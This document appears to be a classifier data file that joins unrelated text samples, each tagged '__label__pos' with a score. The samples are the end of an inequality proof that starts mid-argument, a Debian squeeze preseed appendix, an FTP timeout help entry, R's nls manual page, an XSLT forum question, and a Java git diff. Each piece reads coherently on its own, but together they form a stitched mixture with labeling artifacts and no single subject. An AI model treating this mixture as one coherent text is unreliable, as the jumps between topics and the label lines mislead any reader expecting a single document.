$$\left(\frac{1}{a^2}+\frac{1}{b^2}\right)(1^2+1^2) \ge 16, \qquad \frac{1}{a^2}+\frac{1}{b^2} \ge 8.$$

Thus
$$\left(a+\frac{1}{a}\right)^2+\left(b+\frac{1}{b}\right)^2 \ge \frac{1}{2}+8+4=\frac{25}{2}.$$
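A quick check, added here, that the bound $\frac{25}{2}$ is tight: all three arguments pivot on $a^2+b^2\ge\frac12$ and $ab\le\frac14$, and both become equalities at $a=b=\frac12$, where
$$\left(\tfrac12+2\right)^2+\left(\tfrac12+2\right)^2=2\left(\tfrac52\right)^2=\frac{25}{2}.$$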
__label__pos
0.999901
B.4. Contents of the preconfiguration file (for squeeze)

The configuration fragments used in this appendix are also available as an example preconfiguration file from http://www.debian.org/releases/squeeze/example-preseed.txt.

Note that this example is based on an installation for the Intel x86 architecture. If you are installing a different architecture, some of the examples (like keyboard selection and bootloader installation) may not be relevant and will need to be replaced by debconf settings appropriate for your architecture.

Details on how the different Debian Installer components actually work can be found in Section 6.3, "Using Individual Components".

B.4.1. Localization

Setting localization values will only work if you are using initrd preseeding. With all other methods the preconfiguration file will only be loaded after these questions have been asked.

The locale can be used to specify both language and country and can be any combination of a language supported by debian-installer and a recognized country. If the combination does not form a valid locale, the installer will automatically select a locale that is valid for the selected language. To specify the locale as a boot parameter, use locale=en_US.

Although this method is very easy to use, it does not allow preseeding of all possible combinations of language, country and locale[24]. So alternatively the values can be preseeded individually. Language and country can also be specified as boot parameters.

# Preseeding only locale sets language, country and locale.
d-i debian-installer/locale string en_US

# The values can also be preseeded individually for greater flexibility.
#d-i debian-installer/language string en
#d-i debian-installer/country string NL
#d-i debian-installer/locale string en_GB.UTF-8
# Optionally specify additional locales to be generated.
#d-i localechooser/supported-locales en_US.UTF-8, nl_NL.UTF-8

Keyboard configuration consists of selecting a keyboard architecture and a keymap. In most cases the correct keyboard architecture is selected by default, so there's normally no need to preseed it. The keymap must be known to the debian-installer for the selected keyboard architecture.

# Keyboard selection.
#d-i console-tools/archs select at
d-i console-keymaps-at/keymap select us
d-i keyboard-configuration/xkb-keymap select us
# Example for a different keyboard architecture
#d-i console-keymaps-usb/keymap select mac-usb-us

To skip keyboard configuration, preseed console-tools/archs with skip-config. This will result in the kernel keymap remaining active.

Note: The changes in the input layer for 2.6 kernels have made the keyboard architecture virtually obsolete. For 2.6 kernels normally a "PC" (at) keymap should be selected.

B.4.2. Network configuration

Of course, preseeding the network configuration won't work if you're loading your preconfiguration file from the network. But it's great when you're booting from CD or USB stick. If you are loading preconfiguration files from the network, you can pass network config parameters by using kernel boot parameters.

If you need to pick a particular interface when netbooting before loading a preconfiguration file from the network, use a boot parameter such as interface=eth1.

Although preseeding the network configuration is normally not possible when using network preseeding (using "preseed/url"), you can use the following hack to work around that, for example if you'd like to set a static address for the network interface. The hack is to force the network configuration to run again after the preconfiguration file has been loaded by creating a "preseed/run" script containing the following commands:

killall.sh; netcfg

The following debconf variables are relevant for network configuration.

# Disable network configuration entirely. This is useful for cdrom
# installations on non-networked devices where the network questions,
# warning and long timeouts are a nuisance.
#d-i netcfg/enable boolean false

# netcfg will choose an interface that has link if possible. This makes it
# skip displaying a list if there is more than one interface.
d-i netcfg/choose_interface select auto

# To pick a particular interface instead:
#d-i netcfg/choose_interface select eth1

# If you have a slow dhcp server and the installer times out waiting for
# it, this might be useful.
#d-i netcfg/dhcp_timeout string 60

# If you prefer to configure the network manually, uncomment this line and
# the static network configuration below.
#d-i netcfg/disable_dhcp boolean true

# If you want the preconfiguration file to work on systems both with and
# without a dhcp server, uncomment these lines and the static network
# configuration below.
#d-i netcfg/dhcp_failed note
#d-i netcfg/dhcp_options select Configure network manually

# Static network configuration.
#d-i netcfg/get_nameservers string 192.168.1.1
#d-i netcfg/get_ipaddress string 192.168.1.42
#d-i netcfg/get_netmask string 255.255.255.0
#d-i netcfg/get_gateway string 192.168.1.1
#d-i netcfg/confirm_static boolean true

# Any hostname and domain names assigned from dhcp take precedence over
# values set here. However, setting the values still prevents the questions
# from being shown, even if values come from dhcp.
d-i netcfg/get_hostname string unassigned-hostname
d-i netcfg/get_domain string unassigned-domain

# Disable that annoying WEP key dialog.
d-i netcfg/wireless_wep string
# The wacky dhcp hostname that some ISPs use as a password of sorts.
#d-i netcfg/dhcp_hostname string radish

# If non-free firmware is needed for the network or other hardware, you can
# configure the installer to always try to load it, without prompting. Or
# change to false to disable asking.
#d-i hw-detect/load_firmware boolean true

Please note that netcfg will automatically determine the netmask if netcfg/get_netmask is not preseeded. In this case, the variable has to be marked as seen for automatic installations. Similarly, netcfg will choose an appropriate address if netcfg/get_gateway is not set. As a special case, you can set netcfg/get_gateway to "none" to specify that no gateway should be used.

B.4.3. Network console

# Use the following settings if you wish to make use of the network-console
# component for remote installation over SSH. This only makes sense if you
# intend to perform the remainder of the installation manually.
#d-i anna/choose_modules string network-console
#d-i network-console/password password r00tme
#d-i network-console/password-again password r00tme

B.4.4. Mirror settings

Depending on the installation method you use, a mirror may be used to download additional components of the installer, to install the base system, and to set up the /etc/apt/sources.list for the installed system.

The parameter mirror/suite determines the suite for the installed system.

The parameter mirror/udeb/suite determines the suite for additional components for the installer. It is only useful to set this if components are actually downloaded over the network and should match the suite that was used to build the initrd for the installation method used for the installation. Normally the installer will automatically use the correct value and there should be no need to set this.

# If you select ftp, the mirror/country string does not need to be set.
#d-i mirror/protocol string ftp
d-i mirror/country string manual
d-i mirror/http/hostname string http.us.debian.org
d-i mirror/http/directory string /debian
d-i mirror/http/proxy string

# Suite to install.
#d-i mirror/suite string testing
# Suite to use for loading installer components (optional).
#d-i mirror/udeb/suite string testing

B.4.5. Account setup

The password for the root account and name and password for a first regular user's account can be preseeded. For the passwords you can use either clear text values or MD5 hashes.

Warning: Be aware that preseeding passwords is not completely secure as everyone with access to the preconfiguration file will have the knowledge of these passwords. Using MD5 hashes is considered slightly better in terms of security but it might also give a false sense of security as access to a MD5 hash allows for brute force attacks.

# Skip creation of a root account (normal user account will be able to
# use sudo).
#d-i passwd/root-login boolean false
# Alternatively, to skip creation of a normal user account.
#d-i passwd/make-user boolean false

# Root password, either in clear text
#d-i passwd/root-password password r00tme
#d-i passwd/root-password-again password r00tme
# or encrypted using an MD5 hash.
#d-i passwd/root-password-crypted password [MD5 hash]

# To create a normal user account.
#d-i passwd/user-fullname string Debian User
#d-i passwd/username string debian
# Normal user's password, either in clear text
#d-i passwd/user-password password insecure
#d-i passwd/user-password-again password insecure
# or encrypted using an MD5 hash.
#d-i passwd/user-password-crypted password [MD5 hash]
# Create the first user with the specified UID instead of the default.
#d-i passwd/user-uid string 1010

# The user account will be added to some standard initial groups. To
# override that, use this.
#d-i passwd/user-default-groups string audio cdrom video

The passwd/root-password-crypted and passwd/user-password-crypted variables can also be preseeded with "!" as their value. In that case, the corresponding account is disabled. This may be convenient for the root account, provided of course that an alternative method is set up to allow administrative activities or root login (for instance by using SSH key authentication or sudo).

The following command can be used to generate an MD5 hash for a password:

$ printf "r00tme" | mkpasswd -s -m md5

B.4.6. Clock and time zone setup

# Controls whether or not the hardware clock is set to UTC.
d-i clock-setup/utc boolean true

# You may set this to any valid setting for $TZ; see the contents of
# /usr/share/zoneinfo/ for valid values.
d-i time/zone string US/Eastern

# Controls whether to use NTP to set the clock during the install
d-i clock-setup/ntp boolean true
# NTP server to use. The default is almost always fine here.
#d-i clock-setup/ntp-server string ntp.example.com

B.4.7. Partitioning

Using preseeding to partition the harddisk is limited to what is supported by partman-auto. You can choose to partition either existing free space on a disk or a whole disk. The layout of the disk can be determined by using a predefined recipe, a custom recipe from a recipe file or a recipe included in the preconfiguration file.

Preseeding of advanced partition setups using RAID, LVM and encryption is supported, but not with the full flexibility possible when partitioning during a non-preseeded install.

The examples below only provide basic information on the use of recipes. For detailed information see the files partman-auto-recipe.txt and partman-auto-raid-recipe.txt included in the debian-installer package. Both files are also available from the debian-installer source repository. Note that the supported functionality may change between releases.

Warning: The identification of disks is dependent on the order in which their drivers are loaded. If there are multiple disks in the system, make very sure the correct one will be selected before using preseeding.

B.4.7.1. Partitioning example

# If the system has free space you can choose to only partition that space.
# This is only honoured if partman-auto/method (below) is not set.
#d-i partman-auto/init_automatically_partition select biggest_free

# Alternatively, you may specify a disk to partition. If the system has only
# one disk the installer will default to using that, but otherwise the device
# name must be given in traditional, non-devfs format (so e.g. /dev/hda or
# /dev/sda, and not e.g. /dev/discs/disc0/disc).
# For example, to use the first SCSI/SATA hard disk:
#d-i partman-auto/disk string /dev/sda
# In addition, you'll need to specify the method to use.
# The presently available methods are:
# - regular: use the usual partition types for your architecture
# - lvm:     use LVM to partition the disk
# - crypto:  use LVM within an encrypted partition
d-i partman-auto/method string lvm

# If one of the disks that are going to be automatically partitioned
# contains an old LVM configuration, the user will normally receive a
# warning. This can be preseeded away...
d-i partman-lvm/device_remove_lvm boolean true
# The same applies to pre-existing software RAID array:
d-i partman-md/device_remove_md boolean true
# And the same goes for the confirmation to write the lvm partitions.
d-i partman-lvm/confirm boolean true

# You can choose one of the three predefined partitioning recipes:
# - atomic: all files in one partition
# - home:   separate /home partition
# - multi:  separate /home, /usr, /var, and /tmp partitions
d-i partman-auto/choose_recipe select atomic

# Or provide a recipe of your own...
# If you have a way to get a recipe file into the d-i environment, you can
# just point at it.
#d-i partman-auto/expert_recipe_file string /hd-media/recipe

# If not, you can put an entire recipe into the preconfiguration file in one
# (logical) line. This example creates a small /boot partition, suitable
# swap, and uses the rest of the space for the root partition:
#d-i partman-auto/expert_recipe string                         \
#      boot-root ::                                            \
#              40 50 100 ext3                                  \
#                      $primary{ } $bootable{ }                \
#                      method{ format } format{ }              \
#                      use_filesystem{ } filesystem{ ext3 }    \
#                      mountpoint{ /boot }                     \
#              .                                               \
#              500 10000 1000000000 ext3                       \
#                      method{ format } format{ }              \
#                      use_filesystem{ } filesystem{ ext3 }    \
#                      mountpoint{ / }                         \
#              .                                               \
#              64 512 300% linux-swap                          \
#                      method{ swap } format{ }                \
#              .

# The full recipe format is documented in the file partman-auto-recipe.txt
# included in the 'debian-installer' package or available from D-I source
# repository. This also documents how to specify settings such as file
# system labels, volume group names and which physical devices to include
# in a volume group.

# This makes partman automatically partition without confirmation, provided
# that you told it what to do using one of the methods above.
d-i partman-partitioning/confirm_write_new_label boolean true
d-i partman/choose_partition select finish
d-i partman/confirm boolean true
d-i partman/confirm_nooverwrite boolean true

B.4.7.2. Partitioning using RAID

You can also use preseeding to set up partitions on software RAID arrays. Supported are RAID levels 0, 1, 5, 6 and 10, creating degraded arrays and specifying spare devices.

Warning: This type of automated partitioning is easy to get wrong. It is also functionality that receives relatively little testing from the developers of debian-installer. The responsibility to get the various recipes right (so they make sense and don't conflict) lies with the user. Check /var/log/syslog if you run into problems.

# The method should be set to "raid".
#d-i partman-auto/method string raid
# Specify the disks to be partitioned. They will all get the same layout,
# so this will only work if the disks are the same size.
#d-i partman-auto/disk string /dev/sda /dev/sdb

# Next you need to specify the physical partitions that will be used.
#d-i partman-auto/expert_recipe string \
#      multiraid ::                                         \
#              1000 5000 4000 raid                          \
#                      $primary{ } method{ raid }           \
#              .                                            \
#              64 512 300% raid                             \
#                      method{ raid }                       \
#              .                                            \
#              500 10000 1000000000 raid                    \
#                      method{ raid }                       \
#              .

# Last you need to specify how the previously defined partitions will be
# used in the RAID setup. Remember to use the correct partition numbers
# for logical partitions. RAID levels 0, 1, 5, 6 and 10 are supported;
# devices are separated using "#".
# Parameters are:
# <raidtype> <devcount> <sparecount> <fstype> <mountpoint> \
#          <devices> <sparedevices>
#d-i partman-auto-raid/recipe string \
#    1 2 0 ext3 /                    \
#          /dev/sda1#/dev/sdb1       \
#    .                               \
#    1 2 0 swap -                    \
#          /dev/sda5#/dev/sdb5       \
#    .                               \
#    0 2 0 ext3 /home                \
#          /dev/sda6#/dev/sdb6       \
#    .

# For additional information see the file partman-auto-raid-recipe.txt
# included in the 'debian-installer' package or available from D-I source
# repository.

# This makes partman automatically partition without confirmation.
d-i partman-md/confirm boolean true
d-i partman-partitioning/confirm_write_new_label boolean true
d-i partman/choose_partition select finish
d-i partman/confirm boolean true
d-i partman/confirm_nooverwrite boolean true

B.4.7.3. Controlling how partitions are mounted

Normally, filesystems are mounted using a universally unique identifier (UUID) as a key; this allows them to be mounted properly even if their device name changes. UUIDs are long and difficult to read, so, if you prefer, the installer can mount filesystems based on the traditional device names, or based on a label you assign. If you ask the installer to mount by label, any filesystems without a label will be mounted using a UUID instead.

Devices with stable names, such as LVM logical volumes, will continue to use their traditional names rather than UUIDs.

Warning: Traditional device names may change based on the order in which the kernel discovers devices at boot, which may cause the wrong filesystem to be mounted. Similarly, labels are likely to clash if you plug in a new disk or a USB drive, and if that happens your system's behaviour when started will be random.

# The default is to mount by UUID, but you can also choose "traditional" to
# use traditional device names, or "label" to try filesystem labels before
# falling back to UUIDs.
#d-i partman/mount_style select uuid

B.4.8. Base system installation

There is actually not very much that can be preseeded for this stage of the installation. The only questions asked concern the installation of the kernel.

# Configure APT to not install recommended packages by default. Use of this
# option can result in an incomplete system and should only be used by very
# experienced users.
#d-i base-installer/install-recommends boolean false

# Select the initramfs generator used to generate the initrd for 2.6 kernels.
#d-i base-installer/kernel/linux/initramfs-generators string initramfs-tools

# The kernel image (meta) package to be installed; "none" can be used if no
# kernel is to be installed.
#d-i base-installer/kernel/image string linux-image-2.6-486

B.4.9. Apt setup

Setup of the /etc/apt/sources.list and basic configuration options is fully automated based on your installation method and answers to earlier questions. You can optionally add other (local) repositories.

# You can choose to install non-free and contrib software.
#d-i apt-setup/non-free boolean true
#d-i apt-setup/contrib boolean true
# Uncomment this if you don't want to use a network mirror.
#d-i apt-setup/use_mirror boolean false
# Select which update services to use; define the mirrors to be used.
# Values shown below are the normal defaults.
#d-i apt-setup/services-select multiselect security, volatile
#d-i apt-setup/security_host string security.debian.org
#d-i apt-setup/volatile_host string volatile.debian.org

# Additional repositories, local[0-9] available
#d-i apt-setup/local0/repository string \
#       http://local.server/debian stable main
#d-i apt-setup/local0/comment string local server
# Enable deb-src lines
#d-i apt-setup/local0/source boolean true
# URL to the public key of the local repository; you must provide a key or
# apt will complain about the unauthenticated repository and so the
# sources.list line will be left commented out
#d-i apt-setup/local0/key string http://local.server/key

# By default the installer requires that repositories be authenticated
# using a known gpg key. This setting can be used to disable that
# authentication. Warning: Insecure, not recommended.
#d-i debian-installer/allow_unauthenticated boolean true

B.4.10. Package selection

You can choose to install any combination of tasks that are available. Available tasks as of this writing include:

• standard
• desktop
• gnome-desktop
• kde-desktop
• web-server
• print-server
• dns-server
• file-server
• mail-server
• sql-database
• laptop

You can also choose to install no tasks, and force the installation of a set of packages in some other way. We recommend always including the standard task.

If you want to install some individual packages in addition to packages installed by tasks, you can use the parameter pkgsel/include. The value of this parameter can be a list of packages separated by either commas or spaces, which allows it to be used easily on the kernel command line as well.

#tasksel tasksel/first multiselect standard, web-server
# If the desktop task is selected, install the kde and xfce desktops
# instead of the default gnome desktop.
#tasksel tasksel/desktop multiselect kde, xfce

# Individual additional packages to install
#d-i pkgsel/include string openssh-server build-essential
# Whether to upgrade packages after debootstrap.
# Allowed values: none, safe-upgrade, full-upgrade
#d-i pkgsel/upgrade select none

# Some versions of the installer can report back on what software you have
# installed, and what software you use. The default is not to report back,
# but sending reports helps the project determine what software is most
# popular and include it on CDs.
#popularity-contest popularity-contest/participate boolean false

B.4.11. Finishing up the installation

# During installations from serial console, the regular virtual consoles
# (VT1-VT6) are normally disabled in /etc/inittab. Uncomment the next
# line to prevent this.
#d-i finish-install/keep-consoles boolean true

# Avoid that last message about the install being complete.
d-i finish-install/reboot_in_progress note

# This will prevent the installer from ejecting the CD during the reboot,
# which is useful in some situations.
#d-i cdrom-detect/eject boolean false

# This is how to make the installer shutdown when finished, but not
# reboot into the installed system.
#d-i debian-installer/exit/halt boolean true
# This will power off the machine instead of just halting it.
#d-i debian-installer/exit/poweroff boolean true

B.4.12. Preseeding other packages

# Depending on what software you choose to install, or if things go wrong
# during the installation process, it's possible that other questions may
# be asked. You can preseed those too, of course. To get a list of every
# possible question that could be asked during an install, do an
# installation, and then run these commands:
#   debconf-get-selections --installer > file
#   debconf-get-selections >> file

[24] Preseeding locale to en_NL would for example result in en_US.UTF-8 as default locale for the installed system. If e.g. en_GB.UTF-8 is preferred instead, the values will need to be preseeded individually.
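To make the fragments above concrete, here is a minimal sketch of a complete preseed file assembled only from directives that appear in this appendix; the values are the appendix's example values, not recommendations, and anything beyond these sections (for instance boot loader setup) is not covered here:

# Minimal illustrative preseed, assembled from the examples above
d-i debian-installer/locale string en_US
d-i console-keymaps-at/keymap select us
d-i mirror/country string manual
d-i mirror/http/hostname string http.us.debian.org
d-i mirror/http/directory string /debian
d-i mirror/http/proxy string
d-i passwd/root-password password r00tme
d-i passwd/root-password-again password r00tme
d-i clock-setup/utc boolean true
d-i time/zone string US/Eastern
d-i partman-auto/method string lvm
d-i partman-lvm/confirm boolean true
d-i partman-auto/choose_recipe select atomic
d-i partman-partitioning/confirm_write_new_label boolean true
d-i partman/choose_partition select finish
d-i partman/confirm boolean true
d-i partman/confirm_nooverwrite boolean true
tasksel tasksel/first multiselect standard
d-i finish-install/reboot_in_progress note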
__label__pos
0.614428
I get connection timed out connecting to your FTP server

This is because your firewall or FTP client needs to be adjusted to work correctly with our firewall.

If you are using Bullet Proof FTP, follow these steps: click Options -> General Options -> Firewall, then uncheck "Use Passive Mode".

If you are on Linux, you may also use sftp instead.
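For command-line clients the same adjustment is usually a single option. A sketch, with the hostname and username as placeholders (option syntax from memory, so check your client's documentation):

# OpenSSH's sftp tunnels over SSH, so FTP passive/active firewall issues do not apply:
sftp username@your_hostname.com

# lftp can toggle FTP passive mode explicitly before connecting:
lftp -e "set ftp:passive-mode false" -u username ftp://your_hostname.com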
__label__pos
0.884895
nls {stats}    R Documentation

Nonlinear Least Squares

Description

Determine the nonlinear (weighted) least-squares estimates of the parameters of a nonlinear model.

Usage

nls(formula, data, start, control, algorithm, trace, subset,
    weights, na.action, model, lower, upper, ...)

Arguments

formula: a nonlinear model formula including variables and parameters. Will be coerced to a formula if necessary.

data: an optional data frame in which to evaluate the variables in formula and weights. Can also be a list or an environment, but not a matrix.

start: a named list or named numeric vector of starting estimates. When start is missing, a very cheap guess for start is tried (if algorithm != "plinear").

control: an optional list of control settings. See nls.control for the names of the settable control values and their effect.

algorithm: character string specifying the algorithm to use. The default algorithm is a Gauss-Newton algorithm. Other possible values are "plinear" for the Golub-Pereyra algorithm for partially linear least-squares models and "port" for the 'nl2sol' algorithm from the Port library (see the references). Can be abbreviated.

trace: logical value indicating if a trace of the iteration progress should be printed. Default is FALSE. If TRUE the residual (weighted) sum-of-squares and the parameter values are printed at the conclusion of each iteration. When the "plinear" algorithm is used, the conditional estimates of the linear parameters are printed after the nonlinear parameters. When the "port" algorithm is used the objective function value printed is half the residual (weighted) sum-of-squares.

subset: an optional vector specifying a subset of observations to be used in the fitting process.

weights: an optional numeric vector of (fixed) weights. When present, the objective function is weighted least squares.

na.action: a function which indicates what should happen when the data contain NAs. The default is set by the na.action setting of options, and is na.fail if that is unset. The 'factory-fresh' default is na.omit. Value na.exclude can be useful.

model: logical. If true, the model frame is returned as part of the object. Default is FALSE.

lower, upper: vectors of lower and upper bounds, replicated to be as long as start. If unspecified, all parameters are assumed to be unconstrained. Bounds can only be used with the "port" algorithm. They are ignored, with a warning, if given for other algorithms.

...: additional optional arguments. None are used at present.

Details

An nls object is a type of fitted model object. It has methods for the generic functions anova, coef, confint, deviance, df.residual, fitted, formula, logLik, predict, print, profile, residuals, summary, vcov and weights.

Variables in formula (and weights if not missing) are looked for first in data, then the environment of formula and finally along the search path. Functions in formula are searched for first in the environment of formula and then along the search path.

Arguments subset and na.action are supported only when all the variables in the formula taken from data are of the same length: other cases give a warning.

Note that the anova method does not check that the models are nested: this cannot easily be done automatically, so use with care.

Value

A list of:

m: an nlsModel object incorporating the model.

data: the expression that was passed to nls as the data argument. The actual data values are present in the environment of the m component.

call: the matched call with several components, notably algorithm.

na.action: the "na.action" attribute (if any) of the model frame.

dataClasses: the "dataClasses" attribute (if any) of the "terms" attribute of the model frame.

model: if model = TRUE, the model frame.

weights: if weights is supplied, the weights.

convInfo: a list with convergence information.

control: the control list used, see the control argument.

convergence, message: for an algorithm = "port" fit only, a convergence code (0 for convergence) and message. To use these is deprecated, as they are available from convInfo now.

Warning

Do not use nls on artificial "zero-residual" data. The nls function uses a relative-offset convergence criterion that compares the numerical imprecision at the current parameter estimates to the residual sum-of-squares. This performs well on data of the form y = f(x, θ) + eps (with var(eps) > 0). It fails to indicate convergence on data of the form y = f(x, θ) because the criterion amounts to comparing two components of the round-off error.

If you wish to test nls on artificial data please add a noise component, as shown in the example below.

The algorithm = "port" code appears unfinished, and does not even check that the starting value is within the bounds. Use with caution, especially where bounds are supplied.

Note

Setting warnOnly = TRUE in the control argument (see nls.control) returns a non-converged object (since R version 2.5.0) which might be useful for further convergence analysis, but not for inference.

Author(s)

Douglas M. Bates and Saikat DebRoy; David M. Gay for the Fortran code used by algorithm = "port".

References

Bates, D. M. and Watts, D. G. (1988) Nonlinear Regression Analysis and Its Applications, Wiley.

Bates, D. M. and Chambers, J. M. (1992) Nonlinear models. Chapter 10 of Statistical Models in S, eds J. M. Chambers and T. J. Hastie, Wadsworth & Brooks/Cole.

http://www.netlib.org/port/ for the Port library documentation.

See Also

summary.nls, predict.nls, profile.nls.

Self starting models (with 'automatic initial values'): selfStart.

Examples

require(graphics)

DNase1 <- subset(DNase, Run == 1)

## using a selfStart model
fm1DNase1 <- nls(density ~ SSlogis(log(conc), Asym, xmid, scal), DNase1)
summary(fm1DNase1)
## the coefficients only:
coef(fm1DNase1)
## including their SE, etc:
coef(summary(fm1DNase1))

## using conditional linearity
fm2DNase1 <- nls(density ~ 1/(1 + exp((xmid - log(conc))/scal)),
                 data = DNase1,
                 start = list(xmid = 0, scal = 1),
                 algorithm = "plinear")
summary(fm2DNase1)

## without conditional linearity
fm3DNase1 <- nls(density ~ Asym/(1 + exp((xmid - log(conc))/scal)),
                 data = DNase1,
                 start = list(Asym = 3, xmid = 0, scal = 1))
summary(fm3DNase1)

## using Port's nl2sol algorithm
fm4DNase1 <- nls(density ~ Asym/(1 + exp((xmid - log(conc))/scal)),
                 data = DNase1,
                 start = list(Asym = 3, xmid = 0, scal = 1),
                 algorithm = "port")
summary(fm4DNase1)

## weighted nonlinear regression
Treated <- Puromycin[Puromycin$state == "treated", ]
weighted.MM <- function(resp, conc, Vm, K)
{
    ## Purpose: exactly as white book p. 451 -- RHS for nls()
    ##  Weighted version of Michaelis-Menten model
    ## ----------------------------------------------------------
    ## Arguments: 'y', 'x' and the two parameters (see book)
    ## ----------------------------------------------------------
    ## Author: Martin Maechler, Date: 23 Mar 2001

    pred <- (Vm * conc)/(K + conc)
    (resp - pred) / sqrt(pred)
}

Pur.wt <- nls( ~ weighted.MM(rate, conc, Vm, K), data = Treated,
               start = list(Vm = 200, K = 0.1))
summary(Pur.wt)

## Passing arguments using a list that can not be coerced to a data.frame
lisTreat <- with(Treated, list(conc1 = conc[1], conc.1 = conc[-1], rate = rate))

weighted.MM1 <- function(resp, conc1, conc.1, Vm, K)
{
    conc <- c(conc1, conc.1)
    pred <- (Vm * conc)/(K + conc)
    (resp - pred) / sqrt(pred)
}
Pur.wt1 <- nls( ~ weighted.MM1(rate, conc1, conc.1, Vm, K),
                data = lisTreat, start = list(Vm = 200, K = 0.1))
stopifnot(all.equal(coef(Pur.wt), coef(Pur.wt1)))

## Chambers and Hastie (1992) Statistical Models in S (p. 537):
## If the value of the right side [of formula] has an attribute called
## 'gradient' this should be a matrix with the number of rows equal
## to the length of the response and one column for each parameter.

weighted.MM.grad <- function(resp, conc1, conc.1, Vm, K)
{
    conc <- c(conc1, conc.1)

    K.conc <- K + conc
    dy.dV <- conc/K.conc
    dy.dK <- -Vm*dy.dV/K.conc
    pred <- Vm*dy.dV
    pred.5 <- sqrt(pred)
    dev <- (resp - pred) / pred.5
    Ddev <- -0.5*(resp + pred)/(pred.5*pred)
    attr(dev, "gradient") <- Ddev * cbind(Vm = dy.dV, K = dy.dK)
    dev
}

Pur.wt.grad <- nls( ~ weighted.MM.grad(rate, conc1, conc.1, Vm, K),
                    data = lisTreat, start = list(Vm = 200, K = 0.1))

rbind(coef(Pur.wt), coef(Pur.wt1), coef(Pur.wt.grad))

## In this example, there seems no advantage to providing the gradient.
## In other cases, there might be.

## The two examples below show that you can fit a model to
## artificial data with noise but not to artificial data
## without noise.
x <- 1:10
y <- 2*x + 3                            # perfect fit
yeps <- y + rnorm(length(y), sd = 0.01) # added noise
nls(yeps ~ a + b*x, start = list(a = 0.12345, b = 0.54321))
## terminates in an error, because convergence cannot be confirmed:
try(nls(y ~ a + b*x, start = list(a = 0.12345, b = 0.54321)))

## the nls() internal cheap guess for starting values can be sufficient:
x <- -(1:100)/10
y <- 100 + 10 * exp(x / 2) + rnorm(x)/10
nlmod <- nls(y ~ Const + A * exp(B * x))

plot(x, y, main = "nls(*), data, true function and fit, n=100")
curve(100 + 10 * exp(x / 2), col = 4, add = TRUE)
lines(x, predict(nlmod), col = 2)

## The muscle dataset in MASS is from an experiment on muscle
## contraction on 21 animals. The observed variables are Strip
## (identifier of muscle), Conc (Cacl concentration) and Length
## (resulting length of muscle section).
utils::data(muscle, package = "MASS")

## The non linear model considered is
##       Length = alpha + beta*exp(-Conc/theta) + error
## where theta is constant but alpha and beta may vary with Strip.

with(muscle, table(Strip)) # 2, 3 or 4 obs per strip

## We first use the plinear algorithm to fit an overall model,
## ignoring that alpha and beta might vary with Strip.
musc.1 <- nls(Length ~ cbind(1, exp(-Conc/th)), muscle,
              start = list(th = 1), algorithm = "plinear")
summary(musc.1)

## Then we use nls' indexing feature for parameters in non-linear
## models to use the conventional algorithm to fit a model in which
## alpha and beta vary with Strip. The starting values are provided
## by the previously fitted model.
## Note that with indexed parameters, the starting values must be
## given in a list (with names):
b <- coef(musc.1)
musc.2 <- nls(Length ~ a[Strip] + b[Strip]*exp(-Conc/th), muscle,
              start = list(a = rep(b[2], 21), b = rep(b[3], 21), th = b[1]))
summary(musc.2)

[Package stats version 2.15.3 Index]
I ran into an annoying thing last night where I couldn't do what I was trying to do. Wondering if anybody knows of a better way?

Basically I needed to make a with-param "smarter", so it had a choose statement. But I wasn't passing a string with my with-param, I was passing the node itself.

This works:

<xsl:call-template name="sum-hours">
    <xsl:with-param name="item" select="$item/following-sibling::entry[1]"/>
</xsl:call-template>

But this doesn't:

<xsl:call-template name="sum-hours">
    <xsl:choose>
        <xsl:when test="$type = 'section'">
            <xsl:value-of select="$item/following-sibling::entry[estimate-section-link/item/@id = $selectorid][1]"/>
        </xsl:when>
        <xsl:when test="$type = 'task'">
            <xsl:value-of select="$item/following-sibling::entry[estimate-task-link/item/@id = $selectorid][1]"/>
        </xsl:when>
    </xsl:choose>
</xsl:call-template>

Obviously value-of is to blame here, because it creates a string, but I can't think of another way to do it. Please help!!

Reply: Your second block does not have an xsl:with-param in it. How is it passing the parameter?

Reply: Instead of putting the choose inside call-template, how about putting separate call-template calls inside the when blocks?
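For illustration, here is a sketch of that second suggestion (not from the original thread): invert the nesting so that each when contains its own call-template, and keep the selection in a select attribute so the parameter receives the node itself rather than a string.

<xsl:choose>
    <xsl:when test="$type = 'section'">
        <xsl:call-template name="sum-hours">
            <xsl:with-param name="item"
                select="$item/following-sibling::entry[estimate-section-link/item/@id = $selectorid][1]"/>
        </xsl:call-template>
    </xsl:when>
    <xsl:when test="$type = 'task'">
        <xsl:call-template name="sum-hours">
            <xsl:with-param name="item"
                select="$item/following-sibling::entry[estimate-task-link/item/@id = $selectorid][1]"/>
        </xsl:call-template>
    </xsl:when>
</xsl:choose>

Because the node is chosen with select rather than by instantiating content inside xsl:with-param, sum-hours gets a real node to navigate from instead of a result tree fragment or string.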
Commit 1f41d7c7 authored by Falucho

    Retoques de Datos

parent 96c726a0

AEControlador.java
@@ -26,7 +26,7 @@ public final class AEControlador {
     private boolean forceStop = false;
     private int generacion = 0;
     private int generacionInvariante = 0;
-    private Long startTime = null;
+    private Long startTime = 0L;
     private Long endTime = null;

     //Singleton

ProblemaControlador.java
@@ -20,6 +20,7 @@ public final class ProblemaControlador {
     private HashMap<Integer, Arista> aristasPair;
     private HashMap<Integer, Parada> paradasOriginales;
+    private List<Parada> coordEspeciales;

     private Matrix<Double> matrizOD;
     private Matrix<Integer> matrizDelaysPuntoAPunto;
@@ -36,6 +37,17 @@ public final class ProblemaControlador {
         System.out.println("OK");
     }

+    public List<Parada> getCoordEspeciales() {
+        if (coordEspeciales == null) {
+            coordEspeciales = new ArrayList<>();
+            coordEspeciales.add(new Parada("10000\t3502646\t5611050"));
+            coordEspeciales.add(new Parada("10003\t3453314\t5616550"));
+            coordEspeciales.add(new Parada("10001\t3445756\t5613413"));
+            coordEspeciales.add(new Parada("10002\t3451896\t5601352"));
+        }
+        return coordEspeciales;
+    }
+
     public static ProblemaControlador getInstance() {
         if (INSTANCIA == null) {
             INSTANCIA = new ProblemaControlador();

Inicializador.java
@@ -2,10 +2,7 @@ package uy.edu.fing.lrt.genetic;

 import uy.edu.fing.lrt.controlador.ProblemaControlador;
 import uy.edu.fing.lrt.controlador.PropiedadesControlador;
-import uy.edu.fing.lrt.modelo.Arista;
-import uy.edu.fing.lrt.modelo.Concentrador;
-import uy.edu.fing.lrt.modelo.Individuo;
-import uy.edu.fing.lrt.modelo.Linea;
+import uy.edu.fing.lrt.modelo.*;
 import uy.edu.fing.lrt.util.GlpkUtil;
 import uy.edu.fing.lrt.util.ListUtil;
 import uy.edu.fing.lrt.util.PropiedadesEnum;
